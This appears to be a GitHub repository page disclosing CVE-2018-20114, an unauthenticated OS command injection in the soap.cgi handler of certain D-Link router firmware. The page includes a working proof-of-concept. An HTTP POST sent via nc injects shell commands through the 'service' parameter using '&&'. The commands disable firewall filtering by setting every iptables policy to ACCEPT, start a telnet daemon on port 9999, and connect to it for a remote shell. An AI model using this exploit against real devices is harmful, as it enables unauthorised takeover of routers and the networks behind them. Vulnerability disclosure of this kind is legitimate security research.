Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE/CVE-2018-20114/
CVE/CVE-2018-20114/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

D-Link Unauthenticated OS Command Injection

Exploit Author: pr0v3rbs@kaist.ac.kr

Vender: D-Link

Firmware version: DIR-818LW_REVA - 2.05.B03, DIR-860L_REVB - 2.03.B03

Hardware Link: https://support.dlink.com/ProductInfo.aspx?m=DIR-818LW, https://support.dlink.com/ProductInfo.aspx?m=DIR-860L

The detail of vulnerability

I found unauthenticated remote code execution vulnerability in soapcgi_main function of cgibin binary.

On the /soap.cgi HTTP POST message on 49152 port, with the service GET parameter, the unauthenticated remote attacker can execute the shell command.

The similar vulnerability already exists with CVE-2018-6530, and some firmware was already added character sanitizing with strchr function.

However, on the firmware DIR-818LW_REVA_PATCH_2.05.B03, DIR-860L_REVB_2.03.B03; they not fully filtered the vulnerable character.

With && string, the device can be exploited, too.

PoC

# nc 192.168.0.1 49152
POST /soap.cgi?service=&&iptables -P INPUT ACCEPT&&iptables -P FORWARD ACCEPT&&iptables -P OUTPUT ACCEPT&&iptables -t nat -P PREROUTING ACCEPT&&iptables -t nat -P OUTPUT ACCEPT&&iptables -t nat -P POSTROUTING ACCEPT&&telnetd -p 9999&& HTTP/1.1
Host: 192.168.0.1:49152
Accept-Encoding: identity
Content-Length: 16
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml

# telnet 192.168.0.1 9999